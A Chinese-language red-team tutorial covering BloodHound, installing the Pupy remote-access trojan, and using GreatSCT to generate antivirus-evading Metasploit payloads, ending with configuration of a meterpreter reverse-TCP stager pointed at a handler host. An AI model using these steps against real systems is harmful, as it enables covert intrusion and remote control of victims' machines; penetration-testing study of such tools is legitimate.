0x00 前言

参考Micro8系列第十六课:https://micro8.gitbook.io/micro8/contents-1/11-20/16-hong-lan-dui-kang-shen-tou-ce-shi-1

参考Micro8系列第十七课:https://micro8.gitbook.io/micro8/contents-1/11-20/17-hong-lan-dui-kang-shen-tou-ce-shi-2

参考Micro8系列第十八课:https://micro8.gitbook.io/micro8/contents-1/11-20/18-hong-lan-dui-kang-shen-tou-ce-shi-3

0x01 BloodHound

BloodHound是一款免费的域分析工具,其使用可视化图来显示Active Directory环境中隐藏的和相关联的主机内容。攻击者可以使用BloodHound轻松识别高度复杂的攻击路径,否则很难快速识别。防御者可以使用BloodHound来识别和防御那些相同的攻击路径。蓝队和红队都可以使用BloodHound轻松深入了解Active Directory环境中的权限关系。

工具地址:https://github.com/BloodHoundAD/BloodHound

在内网渗透的域分析工具BloodHound小节中有具体说明。

0x02 Pupy

Pupy是一个开源、跨平台(Windows、Linux、OSX、Android)、多功能RAT(远程管理工具)和主要用Python编写的后期开发工具。它具有全内存读取操作、进程注入等功能。Pupy可以使用各种传输进行通信,迁移到进程(注入),从内存加载远程Python代码。

项目地址:https://github.com/n1nj4sec/pupy

安装:

1
2
3
4
5
6
7
8
9
10
11
git clone https://github.com/n1nj4sec/pupy.git
cd pupy/pupy
pip install rpyc
git submodule update
cd ..
pip install -r pupy/requirements.txt
wget https://github.com/n1nj4sec/pupy/releases/download/latest/payload_templates.txz
tar xvf payload_templates.txz && mv payload_templates/* pupy/payload_templates/ && rm payload_templates.txz && rm -r payload_templates
cd pupy
apt-get install python-xlib
./pupysh.py

如果出现如下报错:

1
2
3
4
5
6
7
8
9
10
11
12
13
Collecting pyautogui
Using cached PyAutoGUI-0.9.36.tar.gz
Complete output from command python setup.py egg_info: 
Traceback (most recent call last):
    File "<string>", line 1, in <module>
    File "/tmp/pip-build-a90ODY/pyautogui/setup.py", line 6, in <module> version=__import__('pyautogui').__version__,
    File "pyautogui/__init__.py", line 115, in <module>
    from . import \_pyautogui_x11 as platformModule
    File "pyautogui/_pyautogui_x11.py", line 160, in <module>
    _display = Display(os.environ['DISPLAY'])
    File "/usr/lib/python2.7/UserDict.py", line 40, in __getitem__
    raise KeyError(key) 
KeyError: 'DISPLAY'

must install on local server with GUI

0x03 GreatSCT

GreatSCT是一款生成可绕过常见反病毒检测机制和应用白名单机制的Metasploit payload的工具。

项目地址:https://github.com/GreatSCT/GreatSCT

安装:

1
2
3
4
5
apt-get -y install git
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/
cd setup
sudo ./setup.sh -c

运行后:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
===========================================================================
Great Scott!
===========================================================================
===========================================================================

Payload information: 

Name: Pure MSBuild C# Reverse TCP Stager
Language: msbuild
Rating: Excellent
Description: pure windows/meterpreter/reverse_tcp stager, no
shellcode 

Payload: msbuild/meterpreter/rev_tcp selected 

Required Options: 

Name Value Description
‐‐‐‐ ‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
DOMAIN X Optional: Required internal domain
EXPIRE_PAYLOAD X Optional: Payloads expire after "Y" days
HOSTNAME X Optional: Required system hostname
INJECT_METHOD Virtual Virtual or Heap
LHOST IP of the Metasploit handler
LPORT 4444 Port of the Metasploit handler
PROCESSORS X Optional: Minimum number of processors
SLEEP X Optional: Sleep "Y" seconds, check if accelerated
TIMEZONE X Optional: Check to validate not in UTC
USERNAME X Optional: The required user account

Available Commands: 

back Go back
exit Completely exit GreatSCT
generate Generate the payload
options Show the shellcode's options
set Set shellcode option 

[msbuild/meterpreter/rev_tcp>>] set LHOST 192.168.1.4 41

[msbuild/meterpreter/rev_tcp>>] set LPORT 53